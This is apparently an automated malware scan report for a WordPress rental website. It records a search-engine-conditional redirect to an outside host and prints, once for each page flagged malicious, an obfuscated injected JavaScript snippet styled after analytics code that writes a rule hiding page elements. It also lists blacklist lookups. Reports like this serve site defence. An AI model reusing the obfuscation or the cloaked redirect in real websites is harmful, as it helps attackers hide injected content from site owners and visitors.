Malicious/Suspicious Redirects
Request | Server response | Status |
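URL: http://cedargablerentals.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: cedargablerentals.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 08 Sep 2014 15:59:27 GMT Location: http://fpert.qpoe.com/ Server: Apache Content-Length: 0 Content-Type: text/html | malicious |
Note: this 302 was returned to a request carrying a search-engine Referer, while the page scan below records 200 OK for the same URL. This suggests the redirect is served conditionally and may not reproduce on a direct visit.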
Scanned pages/files
Request | Server response | Status |
http://cedargablerentals.com/ | 200 OK Content-Length: 12215 Content-Type: text/html | malicious |
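Malicious code - confirmed by antiviruses (see below):
var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z);
Decoding note: the loop joins the five digit strings, reads the result three digits at a time, subtracts 70 from each number and converts it to a character with String.fromCharCode. The method name is assembled from the fragments "fr", "omCh", "arCo" and "de", so it never appears literally in the page source. The `_gw5` array and its `_setOption`/`_trackPageview`/`_setPageId` labels look styled after an analytics snippet. The text passed to document.write decodes to `<style type="text/css">.blog_b{position:absolute;clip:rect(443px,auto,auto,443px);}</style>`, a CSS rule that clips any element with class blog_b out of view. The element it hides is not part of this excerpt. The same snippet is reported for every page marked malicious below.
Antivirus reports: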
| ||
http://cedargablerentals.com/wp-content/themes/dream_vacation_home_hoe113/script.js | 200 OK Content-Length: 6575 Content-Type: application/javascript | clean |
http://cedargablerentals.com/?page_id=11 | 200 OK Content-Length: 9593 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/?page_id=9 | 200 OK Content-Length: 9621 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/?page_id=2 | 200 OK Content-Length: 9714 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/?p=19 | 200 OK Content-Length: 12526 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/?p=1 | 200 OK Content-Length: 12329 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/?cat=1 | 200 OK Content-Length: 12681 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/?feed=rss2 | 200 OK Content-Length: 2952 Content-Type: text/xml | clean |
http://cedargablerentals.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 08 Sep 2014 15:59:34 GMT Location: http://cedargablerentals.com/test404page.js/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://cedargablerentals.com/xmlrpc.php | clean |
http://cedargablerentals.com/test404page.js/ | 200 OK Content-Length: 12215 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/wp-login.php | 200 OK Content-Length: 3541 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://cedargablerentals.com/wp-login.php?action=lostpassword | 200 OK Content-Length: 3184 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw5 = []; _gw5.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw5.push(['_setOption', '6918518510413211616817818117316516819318218118517518617']); _gw5.push(['_trackPageview', '5181180128167168185181178187186171129169178175182128184']); _gw5.push(['_setPageId', '1711691861101221221211821901141671871861811141671871861']); _gw5.push(['_setOption', '81114122122121182190111129195130117185186191178171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw5.length; v++) t += _gw5[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cedargablerentals.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cedargablerentals.com/
Result: cedargablerentals.com is not infected or malware details are not published yet.
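Result: cedargablerentals.com is not infected or malware details are not published yet.
Note: these lookups only report whether the site is currently on each list, so a "not listed" result does not contradict the malicious findings in the scan above.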